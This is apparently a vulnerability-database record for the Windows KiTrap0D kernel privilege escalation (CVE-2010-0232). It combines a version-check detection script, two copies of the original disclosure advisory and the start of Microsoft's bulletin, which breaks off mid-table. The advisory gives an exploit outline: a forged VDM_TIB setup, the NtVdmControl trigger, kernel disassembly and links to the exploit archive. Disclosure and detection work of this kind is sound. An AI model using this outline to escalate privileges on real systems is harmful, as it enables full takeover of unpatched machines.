2K\nif(hotfix_check_sp(win2k:5) > 0)\n{\n # Grep for ntoskrnl.exe version < 5.0.2195.7364\n if(version_is_less(version:exeVer, test_version:\"5.0.2195.7364\")){\n security_message(0);\n }\n}\n\n# Windows XP\nelse if(hotfix_check_sp(xp:4) > 0)\n{\n SP = get_kb_item(\"SMB/WinXP/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n # Grep for ntoskrnl.exe < 5.1.2600.3654\n if(version_is_less(version:exeVer, test_version:\"5.1.2600.3654\")){\n security_message(0);\n }\n exit(0);\n }\n else if(\"Service Pack 3\" >< SP)\n {\n # Grep for ntoskrnl.exe < 5.1.2600.5913\n if(version_is_less(version:exeVer, test_version:\"5.1.2600.5913\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n# Windows 2003\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2003/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n # Grep for ntoskrnl.exe version < 5.2.3790.4637\n if(version_is_less(version:exeVer, test_version:\"5.2.3790.4637\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n## Get System32 path\nsysPath = smb_get_system32root();\nif(sysPath)\n{\n exeVer = fetch_file_version(sysPath, file_name:\"ntoskrnl.exe\");\n if(!exeVer){\n exit(0);\n }\n}\n\n# Windows Vista\nif(hotfix_check_sp(winVista:3) > 0)\n{\n SP = get_kb_item(\"SMB/WinVista/ServicePack\");\n if(\"Service Pack 1\" >< SP)\n {\n # Grep for ntoskrnl.exe version < 6.0.6001.18377\n if(version_is_less(version:exeVer, test_version:\"6.0.6001.18377\")){\n security_message(0);\n }\n exit(0);\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n # Grep for ntoskrnl.exe version < 6.0.6002.18160\n if(version_is_less(version:exeVer, test_version:\"6.0.6002.18160\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n# Windows Server 2008\nelse if(hotfix_check_sp(win2008:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2008/ServicePack\");\n if(\"Service Pack 1\" >< SP)\n {\n # Grep for ntoskrnl.exe version < 6.0.6001.18377\n if(version_is_less(version:exeVer, test_version:\"6.0.6001.18377\")){\n security_message(0);\n }\n exit(0);\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n # Grep for ntoskrnl.exe version < 6.0.6002.18160\n if(version_is_less(version:exeVer, test_version:\"6.0.6002.18160\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n# Windows 7\nelse if(hotfix_check_sp(win7:1) > 0)\n{\n # Grep for ntoskrnl.exe version < 6.1.7600.16481\n if(version_is_less(version:exeVer, test_version:\"6.1.7600.16481\")){\n security_message(0);\n }\n}\n\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "attackerkb": [{"lastseen": "2022-05-01T23:34:21", "description": "The kernel in Microsoft Windows NT 3.1 through Windows 7, including Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, and Windows Server 2008 Gold and SP2, when access to 16-bit applications is enabled on a 32-bit x86 platform, does not properly validate certain BIOS calls, which allows local users to gain privileges by crafting a VDM_TIB data structure in the Thread Environment Block (TEB), and then calling the NtVdmControl function to start the Windows Virtual DOS Machine (aka NTVDM) subsystem, leading to improperly handled exceptions involving the #GP trap handler (nt!KiTrap0D), aka \u201cWindows Kernel Exception Handler Vulnerability.\u201d\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {}, "published": "2010-01-21T00:00:00", "type": "attackerkb", "title": "CVE-2010-0232", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0232"], "modified": "2020-07-30T00:00:00", "id": "AKB:27958A04-890E-49AE-AF68-452CEF076E07", "href": "https://attackerkb.com/topics/6kvEqRfvl8/cve-2010-0232", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:33", "description": "\nMicrosoft Windows NT200020032008XPVista7 - KiTrap0D User Mode to Ring Escalation (MS10-015)", "edition": 2, "cvss3": {}, "published": "2010-01-19T00:00:00", "title": "Microsoft Windows NT200020032008XPVista7 - KiTrap0D User Mode to Ring Escalation (MS10-015)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0232"], "modified": "2010-01-19T00:00:00", "id": "EXPLOITPACK:F4016014B77200EC5255A8FF54D214B2", "href": "", "sourceData": "Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11199.zip (KiTrap0D.zip)\nE-DB Note: Make sure to run \"vdmallowed.exe\" (pre-compiled) inside the subfolder.\n\n\n\nMicrosoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack\n-------------------------------------------------------------------------\n\nCVE-2010-0232\n\nIn order to support BIOS service routines in legacy 16bit applications, the\nWindows NT Kernel supports the concept of BIOS calls in the Virtual-8086 mode\nmonitor code. These are implemented in two stages, the kernel transitions to\nthe second stage when the #GP trap handler (nt!KiTrap0D) detects that the\nfaulting cs:eip matches specific magic values.\n\nTransitioning to the second stage involves restoring execution context and\ncall stack (which had been previously saved) from the faulting trap frame once\nauthenticity has been verified.\n\nThis verification relies on the following incorrect assumptions:\n\n - Setting up a VDM context requires SeTcbPrivilege.\n - ring3 code cannot install arbitrary code segment selectors.\n - ring3 code cannot forge a trap frame.\n\nThis is believed to affect every release of the Windows NT kernel, from\nWindows NT 3.1 (1993) up to and including Windows 7 (2009).\n\nWorking out the details of the attack is left as an exercise for the reader.\n\nJust kidding, that was an homage to Derek Soeder :-)\n\n- Assumption 0: Setting up a VDM context requires SeTcbPrivilege.\n\nCreating a VDM context requires EPROCESS->Flags.VdmAllowed to be set in order\nto access the authenticated system service, NtVdmControl(). VdmAllowed can\nonly be set using NtSetInformationProcess(), which verifies the caller has\nSeTcbPrivilege. If this is true, the caller is very privileged and can\ncertainly be trusted.\n\nThis restriction can be subverted by requesting the NTVDM subsystem, and then\nusing CreateRemoteThread() to execute in the context of the subsystem process,\nwhich will already have this flag set.\n\n- Assumption 1: ring3 code cannot install arbitrary code segment selectors.\n\nCpl is usually equal to the two least significant bits of cs and ss, and is\na simple way to calculate the privilege of a task. However, there is an\nexception, Virtual-8086 mode.\n\nReal mode uses a segmented addressing scheme in order to allow 16-bit\naddresses to access the 20-bit address space. This is achieved by forming\nphysical addresses from a calculation like (cs << 4) + (eip & 0xffff). The\nsame calculation is used to map the segmented real address space onto the\nprotected linear address space in Virtual-8086 mode. Therefore, I must be\npermitted to set cs to any value, and checks for disallowed or privileged\nselectors can be bypassed (PsSetLdtEnties will reject any selector where any\nof the three lower bits are unset, as is the case with the required cs pair).\n\n- Assumption 2: ring3 code cannot forge a trap frame.\n\nReturning to usermode with iret is a complicated operation, the pseudocode for\nthe iret instruction alone spans several pages of Intel's Software Developers\nManual. The operation occurs in two stages, a pre-commit stage and a\npost-commit stage. Using the VdmContext installed using NtVdmControl(), an\ninvalid context can be created that causes iret to fail pre-commit, thus\nforging a trap frame.\n\nThe final requirement involves predicting the address of the second-stage BIOS\ncall handler. The address is static in Windows 2003, XP and earlier operating\nsystems, however, Microsoft introduced kernel base randomisation in Windows\nVista. Unfortunately, this potentially useful exploit mitigation is trivial\nto defeat locally as unprivileged users can simply query the loaded module list\nvia NtQuerySystemInformation().\n\n--------------------\nAffected Software\n------------------------\n\nAll 32bit x86 versions of Windows NT released since 27-Jul-1993 are believed to\nbe affected, including but not limited to the following actively supported\nversions:\n\n - Windows 2000\n - Windows XP\n - Windows Server 2003\n - Windows Vista\n - Windows Server 2008\n - Windows 7\n\n--------------------\nConsequences\n-----------------------\n\nUpon successful exploitation, the kernel stack is switched to an attacker\nspecified address.\n\nAn attacker would trigger the vulnerability by setting up a specially\nformed VDM_TIB in their TEB, using a code sequence like this:\n\n/* ... */\n // Magic CS required for exploitation\n Tib.VdmContext.SegCs = 0x0B;\n // Pointer to fake kernel stack\n Tib.VdmContext.Esi = &KernelStack;\n // Magic IP required for exploitation\n Tib.VdmContext.Eip = Ki386BiosCallReturnAddress;\n\n NtCurrentTeb()->Reserved4[0] = &Tib;\n/* ... */\n\nFollowed by\n\n/* ... */\n NtVdmControl(VdmStartExecution, NULL);\n/* ... */\n\nWhich will reach the following code sequence via the #GP trap handler,\nnt!KiTrap0D. Please note how the stack pointer is restored from the saved\n(untrusted) trap frame at 43C3E6, undoubtedly resulting in the condition\ndescribed above.\n\n/* ... */\n.text:0043C3CE Ki386BiosCallReturnAddress proc near\n.text:0043C3CE mov eax, large fs:KPCR.SelfPcr\n.text:0043C3D4 mov edi, [ebp+KTRAP_FRAME.Esi]\n.text:0043C3D7 mov edi, [edi]\n.text:0043C3D9 mov esi, [eax+KPCR.NtTib.StackBase]\n.text:0043C3DC mov ecx, 84h\n.text:0043C3E1 mov [eax+KPCR.NtTib.StackBase], edi\n.text:0043C3E4 rep movsd\n.text:0043C3E6 mov esp, [ebp+KTRAP_FRAME.Esi]\n.text:0043C3E9 add esp, 4\n.text:0043C3EC mov ecx, [eax+KPCR.PrcbData.CurrentThread]\n.text:0043C3F2 mov [ecx+KTHREAD.InitialStack], edi\n.text:0043C3F5 mov eax, [eax+KPCR.TSS]\n.text:0043C3F8 sub edi, 220h\n.text:0043C3FE mov [eax+KTSS.Esp0], edi\n.text:0043C401 pop edx\n.text:0043C402 mov [ecx+KTHREAD.Teb], edx\n.text:0043C405 pop edx\n.text:0043C406 mov large fs:KPCR.NtTib.Self, edx\n.text:0043C40D mov ebx, large fs:KPCR.GDT\n.text:0043C414 mov [ebx+3Ah], dx\n.text:0043C418 shr edx, 10h\n.text:0043C41B mov byte ptr [ebx+3Ch], dl\n.text:0043C41E mov [ebx+3Fh], dh\n.text:0043C421 sti\n.text:0043C422 pop edi\n.text:0043C423 pop esi\n.text:0043C424 pop ebx\n.text:0043C425 pop ebp\n.text:0043C426 retn 4\n/* ... */\n\nPossibly naive example code for triggering this condition is available from the\nlink below.\n\nhttp://lock.cmpxchg8b.com/c0af0967d904cef2ad4db766a00bc6af/KiTrap0D.zip\nExploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11199.zip (KiTrap0D.zip)\n\nThe code has been tested on Windows XP, Windows Server 2003/2008, Windows Vista\nand Windows 7. Support for other affected operating systems is left as an\nexercise for the interested reader.\n\n-------------------\nMitigation\n-----------------------\n\nIf you believe you may be affected, you should consider applying the workaround\ndescribed below.\n\nTemporarily disabling the MSDOS and WOWEXEC subsystems will prevent the attack\nfrom functioning, as without a process with VdmAllowed, it is not possible to\naccess NtVdmControl() (without SeTcbPrivilege, of course).\n\nThe policy template \"Windows Components\\Application Compatibility\\Prevent\naccess to 16-bit applications\" may be used within the group policy editor to\nprevent unprivileged users from executing 16-bit applications. I'm informed\nthis is an officially supported machine configuration.\n\nAdministrators unfamiliar with group policy may find the videos below\ninstructive. Further information is available from the Windows Server\nGroup Policy Home\n\nhttp://technet.microsoft.com/en-us/windowsserver/grouppolicy/default.aspx.\n\nTo watch a demonstration of this policy being applied to a Windows Server 2003\ndomain controller, see the link below.\n\nhttp://www.youtube.com/watch?v=XRVI4iQ2Nug\n\nTo watch a demonstration of this policy being applied to a Windows Server 2008\ndomain controller, see the link below.\n\nhttp://www.youtube.com/watch?v=u8pfXW7crEQ\n\nTo watch a demonstration of this policy being applied to a shared but\nunjoined Windows XP Professional machine, see the link below.\n\nhttp://www.youtube.com/watch?v=u7Y6d-BVwxk\n\nOn Windows NT4, the following knowledgebase article explains how to disable the\nNTVDM and WOWEXEC subsystems.\n\nhttp://support.microsoft.com/kb/220159\n\nApplying these configuration changes will temporarily prevent users from\naccessing legacy 16-bit MS-DOS and Windows 3.1 applications, however, few users\nrequire this functionality.\n\nIf you do not require this feature and depend on NT security, consider\npermanently disabling it in order to reduce kernel attack surface.\n\n-------------------\nSolution\n-----------------------\n\nMicrosoft was informed about this vulnerability on 12-Jun-2009, and they\nconfirmed receipt of my report on 22-Jun-2009.\n\nRegrettably, no official patch is currently available. As an effective and easy\nto deploy workaround is available, I have concluded that it is in the best\ninterest of users to go ahead with the publication of this document without an\nofficial patch. It should be noted that very few users rely on NT security, the\nprimary audience of this advisory is expected to be domain administrators and\nsecurity professionals.\n\n-------------------\nCredit\n-----------------------\n\nThis bug was discovered by Tavis Ormandy.\n\n-------------------\nGreetz\n-----------------------\n\nGreetz to Julien, Neel, Redpig, Lcamtuf, Spoonm, Skylined, asiraP, LiquidK,\nScaryBeasts, spender and all my other elite colleagues.\n\nCheck out some photography while at ring0 http://flickr.com/meder.\n\n-------------------\nReferences\n-----------------------\n\nDerek Soeder has previously reported some legendary NT bugs, including multiple\nvdm bugs that, while unrelated to this issue, make fascinating reading.\n\n- http://seclists.org/fulldisclosure/2004/Oct/404, Windows VDM #UD LocalPrivilege Escalation\n- http://seclists.org/fulldisclosure/2004/Apr/477, Windows VDM TIB Local Privilege Escalation\n- http://seclists.org/fulldisclosure/2007/Apr/357, Zero Page Race Condition Privilege Escalation\n\n-------------------\nAppendix\n-----------------------\n\nSHA-1 checksum of KiTrap0D.zip follows.\n\n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n99a047427e9085d52aaddfc9214fd1a621534072 KiTrap0D.zip\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.5 (GNU/Linux)\n\niQEVAwUBS1W6+RvyfE4zaHEXAQK//QgAvo/VhPdeASGe7SSfC3jLwNzsfVfM+FMo\nx7JZMMfVUh6b/+FxvokIpsCUf7QQkv+YcyCiatutVjUok5aw5BirFtPLHORIIKPX\nB5gN2a4G8RIXh5yKE6FffKGQsPJNW1Ua5Jss8rf59TEj3EDky1vco+WVmmz7TsHn\nTQdUreVcL8wFmCAgq5X0AKrdepYDBmYLF0AUFOdG3mKJ43dnP59p9R7+ckv0pfLW\nXtvOgzZDNMew4z2Z53YQpE7dO+Y3H3rnhLN7jF7i9We9iiG4ATDke8byFAIDZQZx\nucq5EOcRsfAAWW3O8EbzQa0NiHHScJrKDjvg0gX1Y69MBBwCLNP6yg==\n=LHU0\n-----END PGP SIGNATURE-----\n\n-- \n-------------------------------------\ntavisosdf.lonestar.org | finger me for my gpg key.\n-------------------------------------------------------", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:35", "description": "Invalid exception handling in #GP trap handler allows ring0 privilege escalation", "edition": 1, "cvss3": {}, "published": "2010-01-26T00:00:00", "title": "Microsoft Windows kernel privilege escalation", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2010-0232"], "modified": "2010-01-26T00:00:00", "id": "SECURITYVULNS:VULN:10553", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10553", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:33", "description": "Microsoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack\r\n-------------------------------------------------------------------------\r\n\r\nCVE-2010-0232\r\n\r\nIn order to support BIOS service routines in legacy 16bit applications, the\r\nWindows NT Kernel supports the concept of BIOS calls in the Virtual-8086 mode\r\nmonitor code. These are implemented in two stages, the kernel transitions to\r\nthe second stage when the #GP trap handler (nt!KiTrap0D) detects that the\r\nfaulting cs:eip matches specific magic values.\r\n\r\nTransitioning to the second stage involves restoring execution context and\r\ncall stack (which had been previously saved) from the faulting trap frame once\r\nauthenticity has been verified.\r\n\r\nThis verification relies on the following incorrect assumptions:\r\n\r\n - Setting up a VDM context requires SeTcbPrivilege.\r\n - ring3 code cannot install arbitrary code segment selectors.\r\n - ring3 code cannot forge a trap frame.\r\n\r\nThis is believed to affect every release of the Windows NT kernel, from\r\nWindows NT 3.1 (1993) up to and including Windows 7 (2009).\r\n\r\nWorking out the details of the attack is left as an exercise for the reader.\r\n\r\nJust kidding, that was an homage to Derek Soeder :-)\r\n\r\n- Assumption 0: Setting up a VDM context requires SeTcbPrivilege.\r\n\r\nCreating a VDM context requires EPROCESS->Flags.VdmAllowed to be set in order\r\nto access the authenticated system service, NtVdmControl(). VdmAllowed can\r\nonly be set using NtSetInformationProcess(), which verifies the caller has\r\nSeTcbPrivilege. If this is true, the caller is very privileged and can\r\ncertainly be trusted.\r\n\r\nThis restriction can be subverted by requesting the NTVDM subsystem, and then\r\nusing CreateRemoteThread() to execute in the context of the subsystem process,\r\nwhich will already have this flag set.\r\n\r\n- Assumption 1: ring3 code cannot install arbitrary code segment selectors.\r\n\r\nCpl is usually equal to the two least significant bits of cs and ss, and is\r\na simple way to calculate the privilege of a task. However, there is an\r\nexception, Virtual-8086 mode.\r\n\r\nReal mode uses a segmented addressing scheme in order to allow 16-bit\r\naddresses to access the 20-bit address space. This is achieved by forming\r\nphysical addresses from a calculation like (cs << 4) + (eip & 0xffff). The\r\nsame calculation is used to map the segmented real address space onto the\r\nprotected linear address space in Virtual-8086 mode. Therefore, I must be\r\npermitted to set cs to any value, and checks for disallowed or privileged\r\nselectors can be bypassed (PsSetLdtEnties will reject any selector where any\r\nof the three lower bits are unset, as is the case with the required cs pair).\r\n\r\n- Assumption 2: ring3 code cannot forge a trap frame.\r\n\r\nReturning to usermode with iret is a complicated operation, the pseudocode for\r\nthe iret instruction alone spans several pages of Intel's Software Developers\r\nManual. The operation occurs in two stages, a pre-commit stage and a\r\npost-commit stage. Using the VdmContext installed using NtVdmControl(), an\r\ninvalid context can be created that causes iret to fail pre-commit, thus\r\nforging a trap frame.\r\n\r\nThe final requirement involves predicting the address of the second-stage BIOS\r\ncall handler. The address is static in Windows 2003, XP and earlier operating\r\nsystems, however, Microsoft introduced kernel base randomisation in Windows\r\nVista. Unfortunately, this potentially useful exploit mitigation is trivial\r\nto defeat locally as unprivileged users can simply query the loaded module list\r\nvia NtQuerySystemInformation().\r\n\r\n--------------------\r\nAffected Software\r\n------------------------\r\n\r\nAll 32bit x86 versions of Windows NT released since 27-Jul-1993 are believed to\r\nbe affected, including but not limited to the following actively supported\r\nversions:\r\n\r\n - Windows 2000\r\n - Windows XP\r\n - Windows Server 2003\r\n - Windows Vista\r\n - Windows Server 2008\r\n - Windows 7\r\n\r\n--------------------\r\nConsequences\r\n-----------------------\r\n\r\nUpon successful exploitation, the kernel stack is switched to an attacker\r\nspecified address.\r\n\r\nAn attacker would trigger the vulnerability by setting up a specially\r\nformed VDM_TIB in their TEB, using a code sequence like this:\r\n\r\n/* ... */\r\n // Magic CS required for exploitation\r\n Tib.VdmContext.SegCs = 0x0B;\r\n // Pointer to fake kernel stack\r\n Tib.VdmContext.Esi = &KernelStack;\r\n // Magic IP required for exploitation\r\n Tib.VdmContext.Eip = Ki386BiosCallReturnAddress;\r\n\r\n NtCurrentTeb()->Reserved4[0] = &Tib;\r\n/* ... */\r\n\r\nFollowed by\r\n\r\n/* ... */\r\n NtVdmControl(VdmStartExecution, NULL);\r\n/* ... */\r\n\r\nWhich will reach the following code sequence via the #GP trap handler,\r\nnt!KiTrap0D. Please note how the stack pointer is restored from the saved\r\n(untrusted) trap frame at 43C3E6, undoubtedly resulting in the condition\r\ndescribed above.\r\n\r\n/* ... */\r\n.text:0043C3CE Ki386BiosCallReturnAddress proc near\r\n.text:0043C3CE mov eax, large fs:KPCR.SelfPcr\r\n.text:0043C3D4 mov edi, [ebp+KTRAP_FRAME.Esi]\r\n.text:0043C3D7 mov edi, [edi]\r\n.text:0043C3D9 mov esi, [eax+KPCR.NtTib.StackBase]\r\n.text:0043C3DC mov ecx, 84h\r\n.text:0043C3E1 mov [eax+KPCR.NtTib.StackBase], edi\r\n.text:0043C3E4 rep movsd\r\n.text:0043C3E6 mov esp, [ebp+KTRAP_FRAME.Esi]\r\n.text:0043C3E9 add esp, 4\r\n.text:0043C3EC mov ecx, [eax+KPCR.PrcbData.CurrentThread]\r\n.text:0043C3F2 mov [ecx+KTHREAD.InitialStack], edi\r\n.text:0043C3F5 mov eax, [eax+KPCR.TSS]\r\n.text:0043C3F8 sub edi, 220h\r\n.text:0043C3FE mov [eax+KTSS.Esp0], edi\r\n.text:0043C401 pop edx\r\n.text:0043C402 mov [ecx+KTHREAD.Teb], edx\r\n.text:0043C405 pop edx\r\n.text:0043C406 mov large fs:KPCR.NtTib.Self, edx\r\n.text:0043C40D mov ebx, large fs:KPCR.GDT\r\n.text:0043C414 mov [ebx+3Ah], dx\r\n.text:0043C418 shr edx, 10h\r\n.text:0043C41B mov byte ptr [ebx+3Ch], dl\r\n.text:0043C41E mov [ebx+3Fh], dh\r\n.text:0043C421 sti\r\n.text:0043C422 pop edi\r\n.text:0043C423 pop esi\r\n.text:0043C424 pop ebx\r\n.text:0043C425 pop ebp\r\n.text:0043C426 retn 4\r\n/* ... */\r\n\r\nPossibly naive example code for triggering this condition is availble from the\r\nlink below.\r\n\r\nhttp://lock.cmpxchg8b.com/c0af0967d904cef2ad4db766a00bc6af/KiTrap0D.zip\r\n\r\nThe code has been tested on Windows XP, Windows Server 2003/2008, Windows Vista\r\nand Windows 7. Support for other affected operating systems is left as an\r\nexercise for the interested reader.\r\n\r\n-------------------\r\nMitigation\r\n-----------------------\r\n\r\nIf you believe you may be affected, you should consider applying the workaround\r\ndescribed below.\r\n\r\nTemporarily disabling the MSDOS and WOWEXEC subsystems will prevent the attack\r\nfrom functioning, as without a process with VdmAllowed, it is not possible to\r\naccess NtVdmControl() (without SeTcbPrivilege, of course).\r\n\r\nThe policy template "Windows Components\Application Compatibility\Prevent\r\naccess to 16-bit applications" may be used within the group policy editor to\r\nprevent unprivileged users from executing 16-bit applications. I'm informed\r\nthis is an officially supported machine configuration.\r\n\r\nAdministrators unfamiliar with group policy may find the videos below\r\ninstructive. Further information is available from the Windows Server\r\nGroup Policy Home\r\n\r\nhttp://technet.microsoft.com/en-us/windowsserver/grouppolicy/default.aspx.\r\n\r\nTo watch a demonstration of this policy being applied to a Windows Server 2003\r\ndomain controller, see the link below.\r\n\r\nhttp://www.youtube.com/watch?v=XRVI4iQ2Nug\r\n\r\nTo watch a demonstration of this policy being applied to a Windows Server 2008\r\ndomain controller, see the link below.\r\n\r\nhttp://www.youtube.com/watch?v=u8pfXW7crEQ\r\n\r\nTo watch a demonstration of this policy being applied to a shared but\r\nunjoined Windows XP Professional machine, see the link below.\r\n\r\nhttp://www.youtube.com/watch?v=u7Y6d-BVwxk\r\n\r\nOn Windows NT4, the following knowledgebase article explains how to disable the\r\nNTVDM and WOWEXEC subsystems.\r\n\r\nhttp://support.microsoft.com/kb/220159\r\n\r\nApplying these configuration changes will temporarily prevent users from\r\naccessing legacy 16-bit MS-DOS and Windows 3.1 applications, however, few users\r\nrequire this functionality.\r\n\r\nIf you do not require this feature and depend on NT security, consider\r\npermanently disabling it in order to reduce kernel attack surface.\r\n\r\n-------------------\r\nSolution\r\n-----------------------\r\n\r\nMicrosoft was informed about this vulnerability on 12-Jun-2009, and they\r\nconfirmed receipt of my report on 22-Jun-2009.\r\n\r\nRegrettably, no official patch is currently available. As an effective and easy\r\nto deploy workaround is available, I have concluded that it is in the best\r\ninterest of users to go ahead with the publication of this document without an\r\nofficial patch. It should be noted that very few users rely on NT security, the\r\nprimary audience of this advisory is expected to be domain administrators and\r\nsecurity professionals.\r\n\r\n-------------------\r\nCredit\r\n-----------------------\r\n\r\nThis bug was discovered by Tavis Ormandy.\r\n\r\n-------------------\r\nGreetz\r\n-----------------------\r\n\r\nGreetz to Julien, Neel, Redpig, Lcamtuf, Spoonm, Skylined, asiraP, LiquidK,\r\nScaryBeasts, spender and all my other elite colleagues.\r\n\r\nCheck out some photography while at ring0 @ http://flickr.com/meder.\r\n\r\n-------------------\r\nReferences\r\n-----------------------\r\n\r\nDerek Soeder has previously reported some legendary NT bugs, including multiple\r\nvdm bugs that, while unrelated to this issue, make fascinating reading.\r\n\r\n- http://seclists.org/fulldisclosure/2004/Oct/404, Windows VDM #UD LocalPrivilege\r\nEscalation\r\n- http://seclists.org/fulldisclosure/2004/Apr/477, Windows VDM TIB Local Privilege\r\nEscalation\r\n- http://seclists.org/fulldisclosure/2007/Apr/357, Zero Page Race Condition\r\nPrivilege Escalation\r\n\r\n-------------------\r\nAppendix\r\n-----------------------\r\n\r\nSHA-1 checksum of KiTrap0D.zip follows.\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n99a047427e9085d52aaddfc9214fd1a621534072 KiTrap0D.zip\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.5 (GNU/Linux)\r\n\r\niQEVAwUBS1W6+RvyfE4zaHEXAQK//QgAvo/VhPdeASGe7SSfC3jLwNzsfVfM+FMo\r\nx7JZMMfVUh6b/+FxvokIpsCUf7QQkv+YcyCiatutVjUok5aw5BirFtPLHORIIKPX\r\nB5gN2a4G8RIXh5yKE6FffKGQsPJNW1Ua5Jss8rf59TEj3EDky1vco+WVmmz7TsHn\r\nTQdUreVcL8wFmCAgq5X0AKrdepYDBmYLF0AUFOdG3mKJ43dnP59p9R7+ckv0pfLW\r\nXtvOgzZDNMew4z2Z53YQpE7dO+Y3H3rnhLN7jF7i9We9iiG4ATDke8byFAIDZQZx\r\nucq5EOcRsfAAWW3O8EbzQa0NiHHScJrKDjvg0gX1Y69MBBwCLNP6yg==\r\n=LHU0\r\n-----END PGP SIGNATURE-----\r\n\r\n-- \r\n-------------------------------------\r\ntaviso@sdf.lonestar.org | finger me for my gpg key.\r\n-------------------------------------------------------", "edition": 1, "cvss3": {}, "published": "2010-01-26T00:00:00", "title": "Microsoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2010-0232"], "modified": "2010-01-26T00:00:00", "id": "SECURITYVULNS:DOC:23118", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23118", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:33", "description": "Microsoft Security Bulletin MS10-015 - Important\r\nVulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165)\r\nPublished: February 09, 2010\r\n\r\nVersion: 1.0\r\nGeneral Information\r\nExecutive Summary\r\n\r\nThis security update resolves one publicly disclosed and one privately reported vulnerability in Microsoft Windows. The vulnerabilities could allow elevation of privilege if an attacker logged on to the system and then ran a specially crafted application. To exploit either vulnerability, an attacker must have valid logon credentials and be able to log on locally. The vulnerabilities could not be exploited remotely or by anonymous users.\r\n\r\nThis security update is rated Important for all supported editions of Microsoft Windows 2000, Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, and Windows 7 for 32-bit Systems. For more information, see the subsection, Affected and Non-Affected Software, in this section.\r\n\r\nThe security update addresses the vulnerabilities by ensuring that the Windows Kernel handles exceptions properly. For more information about the vulnerabilities, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information.\r\n\r\nThis security update also addresses the vulnerability first described in Microsoft Security Advisory 979682.\r\n\r\nRecommendation. The majority of customers have automatic updating enabled and will not need to take any action because this security update will be downloaded and installed automatically. Customers who have not enabled automatic updating need to check for updates and install this update manually. For information about specific configuration options in automatic updating, see Microsoft Knowledge Base Article 294871.\r\n\r\nFor administrators and enterprise installations, or end users who want to install this security update manually, Microsoft recommends that customers apply the update at the earliest opportunity using update management software, or by checking for updates using the Microsoft Update service.\r\n\r\nSee also the section, Detection and Deployment Tools and Guidance, later in this bulletin.\r\n\r\nKnown Issues. Microsoft Knowledge Base Article 977165 documents the currently known issues that customers may experience when installing this security update. The article also documents recommended solutions for these issues. When currently known issues and recommended solutions pertain only to specific releases of this software, this article provides links to further articles.\r\nTop of sectionTop of section\r\nAffected and Non-Affected Software\r\n\r\nThe following software have been tested to determine which versions or editions are affected. Other versions or editions are either past their support life cycle or are not affected. To determine the support life cycle for your software version or edition, visit Microsoft Support Lifecycle.\r\n\r\nAffected Software \r\nOperating System\tMaximum Security Impact\tAggregate Severity Rating\tBulletins Replaced by this Update\r\n\r\nMicrosoft Windows 2000 Service Pack 4\r\n\t\r\n\r\nElevation of Privilege\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS09-058\r\n\r\nWindows XP Service Pack 2 and Windows XP Service Pack 